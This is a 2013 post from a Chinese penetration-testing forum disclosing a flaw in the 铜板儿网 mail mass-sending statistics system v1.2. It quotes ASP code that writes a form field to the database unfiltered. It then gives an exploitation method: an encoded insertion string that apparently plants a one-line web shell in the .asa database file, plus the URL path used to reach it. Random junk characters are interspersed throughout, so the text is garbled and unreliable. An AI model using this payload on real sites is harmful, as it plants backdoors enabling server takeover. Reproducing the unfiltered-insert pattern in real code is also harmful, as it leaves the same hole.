中国网络渗透测试联盟

标题: 铜板儿网邮件群发统计系统 v1.2 漏洞 [打印本页]
作者: admin    时间: 2013-3-14 20:14
标题: 铜板儿网邮件群发统计系统 v1.2 漏洞
'Fenlei.asp
6 L# |+ A. t  A. {. G9 p$ e4 l- G. _) ?/ w! j: \5 t
IF Request.QueryString("Action")="del" Then
6 x+ P% I; H7 g3 C" PID=Request.QueryString("ID")
) {# q. e9 A# ]& GIF Countss ("tui","Fenlei",ID )<>0 then 9 K# i& G; T- ~5 X
'略 + W4 L, O: k9 A* N, Y* A
IF Request.QueryString("Action")="Add" Then / ]+ G6 \! K% c1 y) f2 @) G+ F
Tname=Request.Form("Typename")
( r4 t9 U8 A" c* L  P$ [Set Rs=Server.CreateObject("adodb.Recordset")
! X$ C2 K3 C2 C6 a. f; ^' d& J( ?Sql="Select * From Fenlei Order by id Desc " & ]1 z2 Y, f9 e! j
Rs.Open Sql,Conn,1,3
: Z6 R$ T6 B' U% r- iRs.Addnew ( r6 J* U% J4 X" p7 y* l
Rs("Typename")=Tname 2 J9 M, T1 G4 p! Y  A
'略
& U  k8 `+ K8 w# h7 D# H" vSet Rs=Server.CreateObject("adodb.Recordset") ' s/ Z2 R! m& @( b9 q( A, p
Sql="Select * From Fenlei Order by id Desc "
  g, P2 n  S5 O( D3 \& @Rs.Open Sql,Conn,1,1
4 z, z7 n/ m: }'略   r7 i3 A4 x8 W/ n! _. B* n
%>3 x, Z6 i6 [7 r$ H4 k+ O9 H5 D6 Y
, b4 }6 u* Q4 r) V+ U
" D$ L  B+ x* p  v. G! n2 ?

4 i+ m( J  P- @& a# z. `: S3 N4 C没有过滤,直接写入数据库。
) N0 ]' A  q# K. ]
/ s, x+ ^2 b- N利用方法:
/ N& A2 @5 o6 t5 f: D
  H2 ]) m+ E1 R- K$ z插入:┼攠數畣整爠煥敵瑳∨≡┩>9 I# m/ P/ a* Q' m% P4 Y$ C2 E

; q$ H9 Q4 E2 r/ N0 y& O. q8 \ 4 i6 S$ d& T4 a  K5 i5 d" v
连接: http://www.xxx.com/###tongbaner.asa + }8 g$ y! R, Z( L, B8 e- A8 N
'默认安装文件:
9 n/ ?3 u1 }$ X: d& q'install.asp' f; ?* A0 d( |& V6 n& _




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2